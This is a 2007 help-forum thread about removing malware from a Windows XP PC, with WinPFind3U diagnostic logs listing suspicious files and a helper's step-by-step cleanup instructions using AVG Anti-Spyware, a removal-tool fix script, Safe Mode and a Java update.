SV1 -> ->
< DNS Name Servers [HKLM] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Adapters\
{0581109B-E7CC-4D2F-B921-CCF4FB6790E4} -> (Linksys Wireless-G Portable USB Adapter) ->
{20D39951-162D-4C18-BA0D-C3EEBE0EB3AB} -> (D-Link AirPlus G DWL-G510 Wireless PCI Card) ->
{4B250AFE-87CE-406A-B213-8C7324DF6680} -> (Intel® PRO/100 VE Network Connection) ->
{54C8B121-B672-4595-9CA6-5143E89EBCF9} -> (Linksys Wireless-G Portable USB Adapter) ->
{86F8ED03-8E4A-4B80-9904-0E7D717F5A6F} -> (Linksys Wireless-G Portable USB Adapter) ->
{AAB4CE79-BE6C-443B-B902-938DDEE245DC} -> () ->
{DDE840E8-BF69-465D-9359-CB4DE1510B2C} -> (Linksys Wireless-G Portable USB Adapter) ->
< Winsock2 Catalogs [HKLM] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\
Protocol_Catalog9\Catalog_Entries\000000000001 -> %System32%\VetRedir.dll -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 74864 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
Protocol_Catalog9\Catalog_Entries\000000000002 -> %System32%\VetRedir.dll -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 74864 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
Protocol_Catalog9\Catalog_Entries\000000000003 -> %System32%\VetRedir.dll -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 74864 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
Protocol_Catalog9\Catalog_Entries\000000000009 -> %System32%\VetRedir.dll -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 74864 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
< Protocol Handlers [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\
ipp -> Reg Data - Key not found -> File not found
lbxfile -> %ProgramFiles%\Libronix DLS\System\FileProt.dll -> Libronix Corporation [Ver = 2.1.90.1 | Size = 184320 bytes | Modified Date = 4/27/2004 2:25:54 AM | Attr = ]
lbxres -> %ProgramFiles%\Libronix DLS\System\ResProt.dll -> Libronix Corporation [Ver = 2.1.93.1 | Size = 131072 bytes | Modified Date = 4/27/2004 2:29:20 AM | Attr = ]
msdaipp -> Reg Data - Key not found -> File not found
< Downloaded Program Files > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\
{33564D57-0000-0010-8000-00AA00389B71} -> - CodeBase = http://download.microsoft.com/download/F/6...922/wmv9VCM.CAB ->
{4C39376E-FA9D-4349-BACC-D305C1750EF3} -> EPUImageControl Class - CodeBase = http://tools.ebayimg.com/eps/wl/activex/eB...l_v1-0-3-30.cab ->
{4F1E5B1A-2A80-42CA-8532-2D05CB959537} -> MSN Photo Upload Tool - CodeBase = http://by103fd.bay103.hotmail.msn.com/resources/MsnPUpld.cab ->
{8AD9C840-044E-11D1-B3E9-00805F499D93} -> Java Plug-in 1.4.2_04 - CodeBase = http://java.sun.com/update/1.4.2/jinstall-...indows-i586.cab ->
{8E0D4DE5-3180-4024-A327-4DFAD1796A8D} -> MessengerStatsClient Class - CodeBase = http://messenger.zone.msn.com/binary/Messe...nt.cab31267.cab ->
{A8658086-E6AC-4957-BC8E-8D54A7E8A790} -> GDIChk Object - CodeBase = http://www.microsoft.com/security/controls/GDI/0/GDIChk.CAB ->
{AB86CE53-AC9F-449F-9399-D8ABCA09EC09} -> Get_ActiveX Control - CodeBase = https://h17000.www1.hp.com/ewfrf-JAVA/Secur...loadManager.ocx ->
{CAFEEFAC-0014-0002-0004-ABCDEFFEDCBA} -> Java Plug-in 1.4.2_04 - CodeBase = http://java.sun.com/products/plugin/autodl...indows-i586.cab ->
{D1E7CBDA-E60E-4970-A01C-37301EF7BF98} -> Measurement Services Client v.3.7 - CodeBase = http://gameadvisor.futuremark.com/global/msc37.cab ->
{D27CDB6E-AE6D-11CF-96B8-444553540000} -> Shockwave Flash Object - CodeBase = http://download.macromedia.com/pub/shockwa...ash/swflash.cab ->

[Files/Folders - Created Within 90 days]
nvapps.xml -> %SystemDrive%\nvapps.xml -> [Ver = | Size = 38905 bytes | Created Date = 6/2/2007 5:12:25 PM | Attr = ]
$NtUninstallKB925902$ -> %SystemRoot%\$NtUninstallKB925902$ -> [Folder | Created Date = 4/4/2007 3:00:57 AM | Attr = H ]
$NtUninstallKB927891$ -> %SystemRoot%\$NtUninstallKB927891$ -> [Folder | Created Date = 5/22/2007 5:13:44 PM | Attr = H ]
$NtUninstallKB929338$ -> %SystemRoot%\$NtUninstallKB929338$ -> [Folder | Created Date = 3/14/2007 3:01:01 AM | Attr = H ]
$NtUninstallKB930178$ -> %SystemRoot%\$NtUninstallKB930178$ -> [Folder | Created Date = 4/12/2007 3:01:11 AM | Attr = H ]
$NtUninstallKB930916$ -> %SystemRoot%\$NtUninstallKB930916$ -> [Folder | Created Date = 5/14/2007 3:02:27 AM | Attr = H ]
$NtUninstallKB931261$ -> %SystemRoot%\$NtUninstallKB931261$ -> [Folder | Created Date = 4/12/2007 3:01:20 AM | Attr = H ]
$NtUninstallKB931768$ -> %SystemRoot%\$NtUninstallKB931768$ -> [Folder | Created Date = 5/14/2007 3:02:44 AM | Attr = H ]
$NtUninstallKB931784$ -> %SystemRoot%\$NtUninstallKB931784$ -> [Folder | Created Date = 4/12/2007 3:02:17 AM | Attr = H ]
$NtUninstallKB932168$ -> %SystemRoot%\$NtUninstallKB932168$ -> [Folder | Created Date = 4/12/2007 3:00:58 AM | Attr = H ]
spupdsvc.dll -> %SystemRoot%\spupdsvc.dll -> [Ver = | Size = 473600 bytes | Created Date = 3/31/2007 10:44:30 PM | Attr = ]
spupdsvc.exe -> %SystemRoot%\spupdsvc.exe -> [Ver = | Size = 201708 bytes | Created Date = 3/31/2007 10:44:28 PM | Attr = ]
@Alternate Data Stream - 26 bytes -> %SystemRoot%\spupdsvc.exe:Zone.Identifier ->
spupdsvcHook.dll -> %SystemRoot%\spupdsvcHook.dll -> [Ver = | Size = 91648 bytes | Created Date = 3/31/2007 10:44:37 PM | Attr = RHS]
a.exe -> %System32%\a.exe -> [Ver = | Size = 521728 bytes | Created Date = 6/10/2007 1:03:56 AM | Attr = ]
iaxcfg32.dll -> %System32%\iaxcfg32.dll -> [Ver = | Size = 840 bytes | Created Date = 3/29/2007 1:27:36 PM | Attr = ]
istjor.exe -> %System32%\istjor.exe -> [Ver = | Size = 4096 bytes | Created Date = 6/10/2007 1:03:54 AM | Attr = R ]
ktzobo.exe -> %System32%\ktzobo.exe -> [Ver = | Size = 27668 bytes | Created Date = 4/3/2007 12:14:46 PM | Attr = R ]
MRT.INI -> %System32%\MRT.INI -> [Ver = | Size = 4701 bytes | Created Date = 4/12/2007 3:02:04 AM | Attr = ]
NvApps.xml -> %System32%\NvApps.xml -> [Ver = | Size = 0 bytes | Created Date = 6/9/2007 10:57:25 AM | Attr = ]
wmism23delete.exe -> %System32%\wmism23delete.exe -> [Ver = | Size = 1623040 bytes | Created Date = 4/25/2007 5:02:21 PM | Attr = R ]

[Files/Folders - Modified Within 90 days]
BOOT.INI -> %SystemDrive%\BOOT.INI -> [Ver = | Size = 211 bytes | Modified Date = 5/31/2007 7:22:14 AM | Attr = RHS]
Downloaded Full Apps -> %SystemDrive%\Downloaded Full Apps -> [Folder | Modified Date = 6/2/2007 6:37:18 PM | Attr = ]
hiberfil.sys -> %SystemDrive%\hiberfil.sys -> [Ver = | Size = 535875584 bytes | Modified Date = 6/9/2007 11:55:20 AM | Attr = HS]
hpfr5550.xml -> %SystemDrive%\hpfr5550.xml -> [Ver = | Size = 488 bytes | Modified Date = 5/22/2007 3:05:10 AM | Attr = ]
nvapps.xml -> %SystemDrive%\nvapps.xml -> [Ver = | Size = 38905 bytes | Modified Date = 6/2/2007 6:08:26 PM | Attr = ]
Program Files -> %ProgramFiles% -> [Folder | Modified Date = 6/11/2007 9:47:04 PM | Attr = R ]
WINDOWS -> %SystemRoot% -> [Folder | Modified Date = 6/11/2007 11:57:30 AM | Attr = ]
$hf_mig$ -> %SystemRoot%\$hf_mig$ -> [Folder | Modified Date = 5/22/2007 6:13:22 PM | Attr = H ]
$NtUninstallKB925902$ -> %SystemRoot%\$NtUninstallKB925902$ -> [Folder | Modified Date = 4/4/2007 4:01:00 AM | Attr = H ]
$NtUninstallKB927891$ -> %SystemRoot%\$NtUninstallKB927891$ -> [Folder | Modified Date = 5/22/2007 6:13:46 PM | Attr = H ]
$NtUninstallKB929338$ -> %SystemRoot%\$NtUninstallKB929338$ -> [Folder | Modified Date = 3/14/2007 4:01:04 AM | Attr = H ]
$NtUninstallKB930178$ -> %SystemRoot%\$NtUninstallKB930178$ -> [Folder | Modified Date = 4/12/2007 4:01:14 AM | Attr = H ]
$NtUninstallKB930916$ -> %SystemRoot%\$NtUninstallKB930916$ -> [Folder | Modified Date = 5/14/2007 4:02:28 AM | Attr = H ]
$NtUninstallKB931261$ -> %SystemRoot%\$NtUninstallKB931261$ -> [Folder | Modified Date = 4/12/2007 4:01:22 AM | Attr = H ]
$NtUninstallKB931768$ -> %SystemRoot%\$NtUninstallKB931768$ -> [Folder | Modified Date = 5/14/2007 4:02:48 AM | Attr = H ]
$NtUninstallKB931784$ -> %SystemRoot%\$NtUninstallKB931784$ -> [Folder | Modified Date = 4/12/2007 4:02:20 AM | Attr = H ]
$NtUninstallKB932168$ -> %SystemRoot%\$NtUninstallKB932168$ -> [Folder | Modified Date = 4/12/2007 4:01:00 AM | Attr = H ]
1Way.ini -> %SystemRoot%\1Way.ini -> [Ver = | Size = 315 bytes | Modified Date = 5/10/2007 10:30:36 PM | Attr = ]
BOOTSTAT.DAT -> %SystemRoot%\BOOTSTAT.DAT -> [Ver = | Size = 2048 bytes | Modified Date = 6/9/2007 11:55:24 AM | Attr = S]
CAVTemp -> %SystemRoot%\CAVTemp -> [Folder | Modified Date = 6/1/2007 9:46:04 PM | Attr = ]
Help -> %SystemRoot%\Help -> [Folder | Modified Date = 5/22/2007 2:31:56 PM | Attr = ]
imsins.BAK -> %SystemRoot%\imsins.BAK -> [Ver = | Size = 1374 bytes | Modified Date = 5/14/2007 4:03:02 AM | Attr = ]
INF -> %SystemRoot%\INF -> [Folder | Modified Date = 5/22/2007 6:13:54 PM | Attr = H ]
Minidump -> %SystemRoot%\Minidump -> [Folder | Modified Date = 5/5/2007 11:19:12 AM | Attr = ]
MSAGENT -> %SystemRoot%\MSAGENT -> [Folder | Modified Date = 4/12/2007 4:09:08 AM | Attr = ]
Prefetch -> %SystemRoot%\Prefetch -> [Folder | Modified Date = 6/11/2007 9:50:42 PM | Attr = ]
quark.ini -> %SystemRoot%\quark.ini -> [Ver = | Size = 33 bytes | Modified Date = 3/30/2007 7:45:48 AM | Attr = ]
SECURITY -> %SystemRoot%\SECURITY -> [Folder | Modified Date = 4/12/2007 4:08:30 AM | Attr = ]
SoftwareDistribution -> %SystemRoot%\SoftwareDistribution -> [Folder | Modified Date = 5/22/2007 2:31:56 PM | Attr = ]
spupdsvc.dll -> %SystemRoot%\spupdsvc.dll -> [Ver = | Size = 473600 bytes | Modified Date = 3/31/2007 11:44:32 PM | Attr = ]
spupdsvc.exe -> %SystemRoot%\spupdsvc.exe -> [Ver = | Size = 201708 bytes | Modified Date = 3/31/2007 11:44:28 PM | Attr = ]
@Alternate Data Stream - 26 bytes -> %SystemRoot%\spupdsvc.exe:Zone.Identifier ->
spupdsvcHook.dll -> %SystemRoot%\spupdsvcHook.dll -> [Ver = | Size = 91648 bytes | Modified Date = 3/31/2007 11:44:38 PM | Attr = RHS]
SYSTEM.INI -> %SystemRoot%\SYSTEM.INI -> [Ver = | Size = 227 bytes | Modified Date = 5/31/2007 7:22:14 AM | Attr = ]
SYSTEM32 -> %System32% -> [Folder | Modified Date = 6/10/2007 10:43:30 PM | Attr = ]
Temp -> %SystemRoot%\Temp -> [Folder | Modified Date = 6/9/2007 11:55:58 AM | Attr = ]
WIN.INI -> %SystemRoot%\WIN.INI -> [Ver = | Size = 836 bytes | Modified Date = 5/31/2007 7:22:14 AM | Attr = ]
SA.DAT -> %SystemRoot%\tasks\SA.DAT -> [Ver = | Size = 6 bytes | Modified Date = 6/9/2007 11:55:32 AM | Attr = H ]
a.exe -> %System32%\a.exe -> [Ver = | Size = 521728 bytes | Modified Date = 6/10/2007 2:04:02 AM | Attr = ]
CatRoot2 -> %System32%\CatRoot2 -> [Folder | Modified Date = 6/1/2007 7:05:40 PM | Attr = ]
DLLCACHE -> %System32%\DLLCACHE -> [Folder | Modified Date = 5/29/2007 4:03:52 PM | Attr = RHS]
DRIVERS -> %System32%\DRIVERS -> [Folder | Modified Date = 6/9/2007 11:55:42 AM | Attr = ]
FNTCACHE.DAT -> %System32%\FNTCACHE.DAT -> [Ver = | Size = 4350120 bytes | Modified Date = 4/4/2007 4:07:28 AM | Attr = ]
iaxcfg32.dll -> %System32%\iaxcfg32.dll -> [Ver = | Size = 840 bytes | Modified Date = 6/10/2007 2:04:04 AM | Attr = ]
istjor.exe -> %System32%\istjor.exe -> [Ver = | Size = 4096 bytes | Modified Date = 6/10/2007 2:03:56 AM | Attr = R ]
ktzobo.exe -> %System32%\ktzobo.exe -> [Ver = | Size = 27668 bytes | Modified Date = 4/3/2007 1:14:52 PM | Attr = R ]
MRT.INI -> %System32%\MRT.INI -> [Ver = | Size = 4701 bytes | Modified Date = 4/12/2007 4:02:06 AM | Attr = ]
NvApps.xml -> %System32%\NvApps.xml -> [Ver = | Size = 0 bytes | Modified Date = 6/9/2007 11:57:26 AM | Attr = ]
PERFC009.DAT -> %System32%\PERFC009.DAT -> [Ver = | Size = 60550 bytes | Modified Date = 6/9/2007 12:00:00 PM | Attr = ]
PERFH009.DAT -> %System32%\PERFH009.DAT -> [Ver = | Size = 398180 bytes | Modified Date = 6/9/2007 12:00:00 PM | Attr = ]
PerfStringBackup.INI -> %System32%\PerfStringBackup.INI -> [Ver = | Size = 465758 bytes | Modified Date = 6/9/2007 11:59:58 AM | Attr = ]
wmism23delete.exe -> %System32%\wmism23delete.exe -> [Ver = | Size = 1623040 bytes | Modified Date = 4/25/2007 6:21:12 PM | Attr = R ]
WPA.DBL -> %System32%\WPA.DBL -> [Ver = | Size = 1170 bytes | Modified Date = 6/9/2007 11:56:54 AM | Attr = ]
VetEBoot.sys -> %System32%\drivers\VetEBoot.sys -> Computer Associates International, Inc. [Ver = 30.7.0.0 | Size = 108656 bytes | Modified Date = 5/4/2007 8:56:10 AM | Attr = ]
VetEFile.sys -> %System32%\drivers\VetEFile.sys -> Computer Associates International, Inc. [Ver = 30.7.0.0 | Size = 630464 bytes | Modified Date = 5/4/2007 8:56:10 AM | Attr = ]

[File String Scan - Non-Microsoft Only]
@Alternate Data Stream - 26 bytes -> %SystemRoot%\spupdsvc.exe:Zone.Identifier ->
MZKERNEL32.DLL , -> %SystemRoot%\spupdsvc.exe -> [Ver = | Size = 201708 bytes | Modified Date = 3/31/2007 11:44:28 PM | Attr = ]
PEC2 , -> %System32%\DFRG.MSC -> [Ver = | Size = 41397 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
aspack , -> %System32%\TFTP1296 -> [Ver = | Size = 1024 bytes | Modified Date = 3/30/2007 10:58:40 PM | Attr = R ]
winsync , -> %System32%\WBDBASE.DEU -> [Ver = | Size = 1309184 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
Thawte Consulting , -> %System32%\XceedFtp.dll -> Xceed Software Inc (450) 442-2626 support@xceedsoft.com www.xceedsoft.com [Ver = 1.0.42.0 | Size = 236576 bytes | Modified Date = 10/2/2003 6:36:22 PM | Attr = ]
WSUD , UPX0 , -> %System32%\dllcache\hwxjpn.dll -> [Ver = | Size = 13463552 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
PTech , -> %System32%\drivers\mtlstrm.sys -> Smart Link [Ver = 3.80.01MC15 | Size = 1309184 bytes | Modified Date = 8/4/2004 12:41:38 AM | Attr = ]

< End of report >

#4 DigitalFool

DigitalFool
  • Topic Starter

  • Members
  • 39 posts
  • OFFLINE
  •  
  • Local time:03:36 PM

Posted 11 June 2007 - 10:34 PM

I got rid of istjor.exe and a.exe - but these weird file names just keep popping up with 4 or 5 instances of them active in task manager... I can't find the root cause... hope those logs help.

#5 OldTimer

OldTimer

    Malware Expert


  • Members
  • 11,092 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:North Carolina
  • Local time:03:36 PM

Posted 12 June 2007 - 05:36 AM

Hi DigitalFool. Ok, let's get started. First, please print these directions so they will be available to you (we will be rebooting into Safe Mode during the fix).

Next, Please follow the steps below in order:

Step #1

Download AVG anti-spyware from HERE and save that file to your desktop.
  • Once you have downloaded AVG Anti-Spyware, locate the icon on the desktop and double-click it to launch the set up program.
  • Once the setup is complete you will need to run AVG Anti-Spyware and update the definition files.
  • On the main screen select the icon "Update" then select the "Update now" link.
    • Next select the "Start Update" button, the update will start and a progress bar will show the updates being installed.
  • Once the update has completed select the "Scanner" icon at the top of the screen, then select the "Settings" tab.
  • Once in the Settings screen, under "How to act" select "Quarantine".
  • Under "Reports"
    • Select "Automatically generate report after every scan"
    • Un-Select "Only if threats were found"
Close AVG Anti-Spyware, Do Not run a scan just yet, we will shortly.

Step #2

Now start WinPFind3U. Copy/Paste the information in the quotebox below into the pane where it says "Paste fix here" and then click the Run Fix button.

[Kill Explorer]
[Unregister Dlls]
[Processes - Non-Microsoft Only]
YY -> a.exe -> %System32%\a.exe
YY -> istjor.exe -> %System32%\istjor.exe
YY -> istjor.exe -> %System32%\istjor.exe
YY -> istjor.exe -> %System32%\istjor.exe
YY -> istjor.exe -> %System32%\istjor.exe
YY -> istjor.exe -> %System32%\istjor.exe
YY -> istjor.exe -> %System32%\istjor.exe
[Win32 Services - Non-Microsoft Only]
YY -> (Microsoft Update RunOnce Service) spupdsvc. [Win32_Own | Auto | Stopped] -> %SystemRoot%\spupdsvc.exe
[Registry - Non-Microsoft Only]
< Run [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
YY -> MSMSGNER -> %System32%\a.exe
< Run [HKCU] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
YN -> MoneyAgent -> %ProgramFiles%\Microsoft Money\System\mnyexpr.exe
< Internet Explorer Bars [HKCU] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Explorer Bars\
YN -> {32683183-48a0-441b-a342-7c2a440a9478} [HKLM] -> Reg Data - Key not found [Reg Data - Key not found]
< Internet Explorer ToolBars [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar
YN -> {BA52B914-B692-46c4-B683-905236F6F655} [HKLM] -> Reg Data - Key not found [Reg Data - Key not found]
< Internet Explorer ToolBars [HKCU] > -> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\
YN -> ShellBrowser\\{42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} [HKLM] -> Reg Data - Key not found [Reg Data - Key not found]
YN -> WebBrowser\\{42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} [HKLM] -> Reg Data - Key not found [Reg Data - Key not found]
< Internet Explorer Extensions [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\
YN -> {08B0E5C0-4FCB-11CF-AAA5-00401C608501} [HKLM] -> %System32%\msjava.dll [MenuText: Sun Java Console]
YN -> {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} -> Reg Data - Value does not exist [ButtonText: Real.com]
< Internet Explorer Menu Extensions [HKCU] > -> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\
YN -> E&xport to Microsoft Excel ->
[Files/Folders - Created Within 90 days]
NY -> spupdsvc.dll -> %SystemRoot%\spupdsvc.dll
NY -> spupdsvc.exe -> %SystemRoot%\spupdsvc.exe
NY -> spupdsvcHook.dll -> %SystemRoot%\spupdsvcHook.dll
NY -> a.exe -> %System32%\a.exe
NY -> iaxcfg32.dll -> %System32%\iaxcfg32.dll
NY -> istjor.exe -> %System32%\istjor.exe
NY -> ktzobo.exe -> %System32%\ktzobo.exe
NY -> wmism23delete.exe -> %System32%\wmism23delete.exe
[Files/Folders - Modified Within 90 days]
NY -> spupdsvc.dll -> %SystemRoot%\spupdsvc.dll
NY -> spupdsvc.exe -> %SystemRoot%\spupdsvc.exe
NY -> spupdsvcHook.dll -> %SystemRoot%\spupdsvcHook.dll
NY -> a.exe -> %System32%\a.exe
NY -> iaxcfg32.dll -> %System32%\iaxcfg32.dll
NY -> istjor.exe -> %System32%\istjor.exe
NY -> ktzobo.exe -> %System32%\ktzobo.exe
NY -> wmism23delete.exe -> %System32%\wmism23delete.exe
[File String Scan - Non-Microsoft Only]
NY -> MZKERNEL32.DLL , -> %SystemRoot%\spupdsvc.exe
NY -> aspack , -> %System32%\TFTP1296
[Empty Temp Folders]
[Reboot]


The fix should only take a very short time You might be asked to reboot if any of the files could not be moved during the fix. If so, choose Yes and reboot into Safe Mode as shown below. If not, then reboot manually into Safe Mode.

Reboot into Safe Mode by doing the following:
  • As soon as the BIOS is loaded begin tapping the F8 key until the boot menu appears.
  • Use the arrow keys to select the Safe Mode menu item.
  • Press the Enter key.
Step #3

Launch AVG Anti-Spyware by double-clicking the icon on your desktop.

IMPORTANT: Do not open any other windows or programs while AVG Anti-Spyware is scanning, it may interfere with the scanning proccess:
  • Select the "Scanner" icon at the top and then the "Scan" tab then click on "Complete System Scan".
  • AVG Anti-Spyware will now begin the scanning process, be patient this may take a little time.
    Once the scan is complete do the following:
    • IMake sure that Set all elements to: shows Quarantine, if not click on the link and choose Quarantine from the popup menu.
    • At the bottom of the window click on the "Apply all actions" button
    Note: Don't save the report before you hit the Apply action button.
  • Next select the "Reports" icon at the top.
  • Select the "Save report as" button in the lower left hand of the screen and save it to a text file on your system (make sure to remember where you saved that file, this is important).
  • Close AVG Anti-Spyware and reboot your system back into Normal Mode and post the results of the AVG Anti-Spyware report scan.
Step #4

Your Java is out of date. Older versions have vulnerabilities that malware can use to infect your system. Please follow these steps to remove older version Java components and update.

Updating Java:
Note: If there is an Update XX in the name then the "XX" in the version will be whatever the latest version is.
  • Download the latest version of Java Runtime Environment (JRE) 6.0 Update XX (if present).
  • Scroll down to where it says "The J2SE Runtime Environment (JRE) allows end-users to run Java applications".
  • Click the "Download" button to the right.
  • Check the box that says: "Accept License Agreement".
  • The page will refresh.
  • Click on the link to download Windows Offline Installation with or without Multi-language and save to your desktop.
  • Close any programs you may have running - especially your web browser.
  • Go to Start > Control Panel double-click on Add/Remove programs and remove all older versions of Java.
  • Check any item with Java Runtime Environment (JRE or J2SE) in the name.
  • Click the Remove or Change/Remove button.
  • Repeat as many times as necessary to remove each Java versions.
  • Reboot your computer once all Java components are removed.
  • Then from your desktop double-click on jre-1_6_0_XX-windowsi586-p.exe to install the newest version.
Step #5

Post the following back here:
  • a new WinPFind3U report
  • the AVG Anti-Spyware report
  • the latest .log file from the WinPFind3u folder (it will be a .log file and have a date_time name in the format mmddyyyy_hhmmss.log)
I will review the information when it comes back in.

Also let me know of any problems you encountered performing the steps above or any continuing problems you are still having with the computer.

Cheers.

OT
I do not respond to PM's requesting help. That's what the forums are here for. Please use them so that others may benefit from your questions and the responses you receive.
OldTimer

Posted Image

#6 DigitalFool

DigitalFool
  • Topic Starter

  • Members
  • 39 posts
  • OFFLINE
  •  
  • Local time:03:36 PM

Posted 21 June 2007 - 10:43 PM

Sorry for the delay - computer has been suspect, but we'll see how it goes the next few days after your suggestions. Thank you btw.

1) WinPFind3 logfile created on: 6/21/2007 10:31:37 PM
WinPFind3U by OldTimer - Version 1.0.38 Folder = C:\Documents and Settings\Admin\Desktop\WinPFind3u\
Microsoft Windows XP Service Pack 2 (Version = 5.1.2600)
Internet Explorer (Version = 6.0.2900.2180)

510.98 Mb Total Physical Memory | 112.83 Mb Available Physical Memory | 22.08% Memory free
1.22 Gb Paging File | 0.85 Gb Available in Paging File | 69.62% Paging File free
Paging file location(s): C:\pagefile.sys 1028 2056;

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 36.97 Gb Total Space | 3.79 Gb Free Space | 10.24% Space Free
D: Drive not present or media not loaded
E: Drive not present or media not loaded
F: Drive not present or media not loaded

Computer Name: FAMILY
Current User Name: Admin
Logged in as Administrator.
Current Boot Mode: Normal


[Processes - Non-Microsoft Only]
avgas.exe -> %ProgramFiles%\Grisoft\AVG Anti-Spyware 7.5\avgas.exe -> GRISOFT s.r.o. [Ver = 7, 5, 1, 43 | Size = 6731312 bytes | Modified Date = 6/11/2007 4:25:42 AM | Attr = ]
cavrid.exe -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVRid.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 185456 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
cavtray.exe -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVTray.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 230512 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
ctsvccda.exe -> %System32%\CTsvcCDA.EXE -> Creative Technology Ltd [Ver = 1.0.1.0 | Size = 44032 bytes | Modified Date = 12/13/1999 2:01:00 AM | Attr = ]
diagent.exe -> %ProgramFiles%\Creative\SBLive\Diagnostics\diagent.exe -> Creative Technology Ltd [Ver = 1, 1, 4, 0 | Size = 135264 bytes | Modified Date = 4/3/2002 2:01:00 AM | Attr = ]
fxsvr2.exe -> %ProgramFiles%\Logitech\Video\FxSvr2.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 192512 bytes | Modified Date = 1/18/2005 5:08:36 PM | Attr = ]
guard.exe -> %ProgramFiles%\Grisoft\AVG Anti-Spyware 7.5\guard.exe -> GRISOFT s.r.o. [Ver = 7, 5, 1, 22 | Size = 312880 bytes | Modified Date = 5/30/2007 7:31:10 AM | Attr = ]
hotsync.exe -> %ProgramFiles%\Sony Handheld\HOTSYNC.EXE -> Palm, Inc. [Ver = 4.0.1 | Size = 299008 bytes | Modified Date = 5/31/2001 9:52:46 AM | Attr = ]
hpobnz08.exe -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpobnz08.exe -> Hewlett-Packard Co. [Ver = 4.2.0.021 | Size = 323646 bytes | Modified Date = 4/9/2003 6:41:38 PM | Attr = ]
hpoevm08.exe -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpoevm08.exe -> Hewlett-Packard Co. [Ver = 4.2.0.021 | Size = 286720 bytes | Modified Date = 4/9/2003 6:49:36 PM | Attr = ]
hposts08.exe -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hposts08.exe -> Hewlett-Packard Co. [Ver = 4.2.0.021 | Size = 311296 bytes | Modified Date = 4/9/2003 6:59:24 PM | Attr = ]
hpotdd01.exe -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe -> Hewlett-Packard [Ver = 1, 0, 0, 1 | Size = 28672 bytes | Modified Date = 4/9/2003 7:11:12 PM | Attr = ]
hpzipm12.exe -> %System32%\HPZipm12.exe -> HP [Ver = 6, 0, 0, 0 | Size = 65795 bytes | Modified Date = 3/9/2003 3:31:02 PM | Attr = ]
ipodservice.exe -> %ProgramFiles%\iPod\bin\iPodService.exe -> Apple Computer, Inc. [Ver = 7.0.2.16 | Size = 492608 bytes | Modified Date = 10/30/2006 10:36:32 AM | Attr = ]
isafe.exe -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\iSafe.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 259184 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
ituneshelper.exe -> %ProgramFiles%\iTunes\iTunesHelper.exe -> Apple Computer, Inc. [Ver = 7.0.2.16 | Size = 256576 bytes | Modified Date = 10/30/2006 10:36:36 AM | Attr = ]
logitray.exe -> %ProgramFiles%\Logitech\Video\LogiTray.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 217088 bytes | Modified Date = 1/18/2005 5:37:30 PM | Attr = ]
lvcomsx.exe -> %System32%\LVCOMSX.EXE -> Logitech Inc. [Ver = 8.4.1.1092 | Size = 221184 bytes | Modified Date = 10/8/2004 11:52:32 AM | Attr = ]
notifyalert.exe -> %ProgramFiles%\Dell\Support\Alert\bin\NotifyAlert.exe -> [Ver = 2.1.0.72 | Size = 352256 bytes | Modified Date = 10/7/2003 5:20:18 PM | Attr = ]
qttask.exe -> %ProgramFiles%\QuickTime\qttask.exe -> Apple Computer, Inc. [Ver = 7.1.3 | Size = 282624 bytes | Modified Date = 10/25/2006 7:58:18 PM | Attr = ]
support.exe -> %CommonProgramFiles%\Dell\EUSW\Support.exe -> Dell [Ver = 2, 1, 1, 0 | Size = 323584 bytes | Modified Date = 5/27/2004 9:05:42 PM | Attr = ]
usbswt.exe -> %ProgramFiles%\Sony Handheld\USBSwt.exe -> Sony Corporation [Ver = 1.10.0008210 | Size = 57344 bytes | Modified Date = 2/2/2001 12:13:00 AM | Attr = ]
